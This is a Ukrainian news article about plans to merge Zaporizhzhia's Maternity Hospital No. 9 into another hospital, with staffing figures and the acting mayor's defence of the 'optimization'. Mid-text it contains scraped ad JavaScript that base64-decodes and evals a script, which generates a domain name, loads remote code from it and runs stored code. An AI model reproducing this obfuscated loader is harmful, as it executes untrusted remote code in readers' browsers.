Реорганізація чи закриття: що насправді відбувається з пологовим будинком №9 у Запоріжжі

25 серпня у Запорізькій міськраді відбулося засідання комісії з питання реорганізації Пологового будинку №9, який обслуговує пацієнтів у Хортицькому районі.

Про те, що відбувається навколо цього медичного закладу, з власних джерел дізнавався «Акцент».

Як раніше і повідомляла у соцмережах народний депутат Юлія Яцик, пологовий будинок дійсно планували передати воєнному госпіталю. Цю інформацію працівники закладу дізналися з соціальних мереж, як і інші містяни.

Після того як питання отримало розголос, а мешканці міста обурилися, рішення про передачу будівлі закладу військовим стали коригувати. Наразі «робочий» варіант — приєдання до Пологового будинку №3, що аж у Шевченківському районі.

Саме це питання розглядала комісія у міськраді, але до одностайного рішення не прийшла: були ті, хто виступив проти. Крім того, навіть представники Пологового будинку №3 виразили неготовність до «злиття» з іншим закладом. Це потягне за собою купу проблем: організаційних труднощів та судової тяганини.

Тож рішення будуть приймати депутати на наступній сесії міськради .

Що буде після «реорганізації»

За нашою інформацією, у Пологовому будинку №9 наразі працює 190 фахівців, а Пологовий будинок №3 зможе влаштувати лише 62 з них. Це з урахуванням того, що з власних співробітників треба бути провести «чистку» через реорганізацію.

Також нам відомо, що жіночу консультацію закладу планують передати Пологовому будинку №4 у Дніпровському районі. Фактично це означає, що основний дохід від роботи отримуватиме цей заклад, Пологовому будинку №3 буде важко організувати роботу, а у Хортицькому районі не буде пологового будинку. Без роботи залишаться щонайменьше 128 фахівців.

За інформацією, яку отримав «Акцент», реорганізацію проводять для того, щоб з часом будівлю медичного закладу отримала приватна медична структура. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

З початком повномасштабної війни у Пологовому будинку №9 народилося 283 дитини. Зараз у відділенні знаходиться 25 породіль. На диспансерному обліку — приблизно 8 тисяч. осіб. Жіноча консультація обслуговує понад 90 тис. жінок, що проживають на правому березі. Він приймає близько 1800 пологів на рік.

Що говорить влада

Т.в.о. міського голови Анатолій Куртєв прокоментував ситуацію з «оптимізацією» медичних закладів:

«Почну з того, що оптимізація буде стосуватися не лише медичної сфери. По-перше, буде оптимізовано усі структури виконавчих органів Запорізької міської ради. А, по-друге, зміни торкнуться адміністративної частини цих структур та дозволять позбавитися задвоєного виконання їхніх функцій. Тобто, кажучи простою мовою, ви, мешканці та гості нашого міста, цих змін на собі не відчуєте (хіба що на краще), а от бюджет громади при цьому отримає суттєве заощадження коштів. А в умовах складного економічного стану для нашого міста це є дуже важливим.

Що стосується медицини, то одразу скажу, що реформування цієї галузі розпочалося по всій країні ще з 2019 року. І за цей час у Запоріжжі було оптимізовано вже не один медзаклад, зокрема шляхом приєднання менш потужних закладів до більш потужних. Але все одно зараз деякі медзаклади міста виконують свої функції лише на 50 відсотків і стоять напівпорожні. Тому ми й плануємо продовжувати процес оптимізації. Що при цьому важливо розуміти? Нова хвиля оптимізації проходитиме лише на юридичному рівні. Тобто приєднання одного медичного закладу до іншого не означає, що один із закладів закриють чи що його медичний персонал буде розформовано. Ні. Це означає, що ці медзаклади будуть обʼєднані виключно як юридичні особи, і за рахунок цього в них буде скорочено адміністративну частину, а от їхні лікарі та медсестри продовжать надавати людям медичну допомогу, як і раніше.

Окрім того, говорячи про скорочення персоналу, зазначу, що зараз штатна чисельність працівників медичних закладів міста складає майже 11 з половиною тисяч одиниць, а фактично з них зайнято 10 330. У результаті оптимізації планується скорочення лише чотирьохсот вісімдесяти семи штатних одиниць. Переважна частина з них – це адмінперсонал та персонал, який виконує дублюючі функції. У будь-якому разі усім людям буде запропоновано нове місце працевлаштування, адже зараз в медичній галузі міста є більше тисячі вакантних посад. Також хочу зазначити, що в результаті проведеної оптимізації бюджет міста отримає економію у розмірі майже пʼятидесяти чотирьох мільйонів гривень. Ці кошти можна буде спрямувати на розвиток медичних закладів, а саме на покращення їхньої матеріально-технічної бази, на придбання дороговартісного медичного обладнання, на проведення поточних та капітальних ремонтів, на термомодернізацію будівель та на низку інших важливих заходів.

Наостанок хочу ще раз зауважити, що оптимізація ніяк не вплине на якість надання медичних послуг, а навпаки дозволить їх покращити. Цьому сприятиме виключення задвоєних функцій, створення профільності лікувальних закладів, а також збільшення потужності як матеріально-технічної бази, так і кадрового потенціалу. І вкотре зазначу, що усі спеціалісти, які виявлять бажання залишитися працювати у медичній галузі міста, матимуть таку можливість. Тому прошу вас не панікувати та довіряти лише офіційним джерелам інформації. А для того, щоб повністю тримати вас в курсі ситуації, кожного вечора я надаватиму вам інформацію по кожному закладу, який ми будемо оптимізувати. Слідкуйте за повідомленнями.

Росіяни «знайшли» військових у пологовому будинку Запоріжжя: хто насправді знаходиться у закладіФахівці пологового будинку №9 у Запоріжжі працюють з жінками на базі хабу для переселенців (ФОТОРЕПОРТАЖ)

Фото: https://grad.ua/ (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/reorganizatsiya-chi-zakrittya-shho-naspravdi-vidbuvayetsya-z-pologovim-budinkom-9-u-zaporizhzhi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top